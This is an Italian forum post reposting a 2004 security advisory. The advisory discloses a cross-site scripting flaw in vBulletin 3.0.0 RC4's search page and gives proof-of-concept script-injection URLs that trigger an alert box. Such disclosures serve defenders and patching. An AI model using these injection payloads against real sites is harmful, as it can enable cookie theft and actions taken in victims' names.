Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 14-02-2004, 13.56.46
Administrator
Amministratore
 
Data registrazione: 12-09-2002
Messaggi: 3,420
serverplan ha disabilitato la reputazione
Predefinito vBulletin PHP Forum Version

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~

Software: vBulletin PHP Forum Version
Vendor: Jelsoft Enterprises Ltd
http://www.vbulletin.com
Versions: 3.0.0 Release Candidate 4
Platforms: Unix/Windows
Bug: Cross Site Scripting Vulnerabillity
Risk: Low
Exploitation: Remote with browser
Date: 24 Jan 2004
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bug
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Cross Site Scripting attacks are the most trusted evil urls when it concerns
to forums, because
forum messages are always long and contain many parameters.
vBulletin is a very trusted forum, it is considered to be a very safe and
security validated forum.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

The Vulnerabillity is Cross Site Scripting. If an attacker will search the
following quert from the server:

<script>alert('XSS')</script>

OR in case you have problems:
<!-- / main error
message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<scrip t>ale
rt('XSS')</script><plaintext>

OR just reffer to
http://<host>/forum/search.php?do=process&showposts=0&query=<script>al ert('X
SS')</script>

XSS appears and the server allows an attacker to inject & execute scripts.

In the words of securityfocus.com :
~~~~~~~~~~~~~~~~~~~~~~~~~~

If all of these circumstances are met, an attacker may be able to exploit
this issue
via a malicious link containing arbitrary HTML and script code as part of
the hostname.
When the malicious link is clicked by an unsuspecting user, the
attacker-supplied HTML
and script code will be executed by their web client. This will occur
because the server
will echo back the malicious hostname supplied in the client's request,
without sufficiently
escaping HTML and script code.

Attacks of this nature may make it possible for attackers to manipulate web
content or to
steal cookie-based authentication credentials. It may be possible to take
arbitrary actions as the victim user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

http://<host>/forum/search.php?do=process&showposts=0&query=<!-- / main
error
message --></p></p></blockquote>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<scrip t>ale
rt('XSS')</script><plaintext>
http://<host>/forum/search.php?do=process&showposts=0&query=<script>al ert('X
SS')</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."
Rispondi citando
Rispondi

Strumenti discussione
Modalità visualizzazione

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
Problema Server - Software vBulletin rave PHP 1 17-11-2007 13.33.35
Advanced Guestbook version 2.4.2 Multiple XSS Attack Vulnera serverplan Vulnerabilità 0 08-05-2007 21.02.42
Unknown License File Version SnaKeZ Pannello di controllo Cpanel - Linux 2 26-04-2007 15.23.58
Vbulletin 2.X sql injection serverplan Vulnerabilità 0 26-09-2006 19.32.54
Multiple vulnerabilities in e107 version 0.615 serverplan Vulnerabilità 0 30-05-2004 10.25.37


Tutti gli orari sono GMT +1. Adesso sono le 14.00.05.


Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it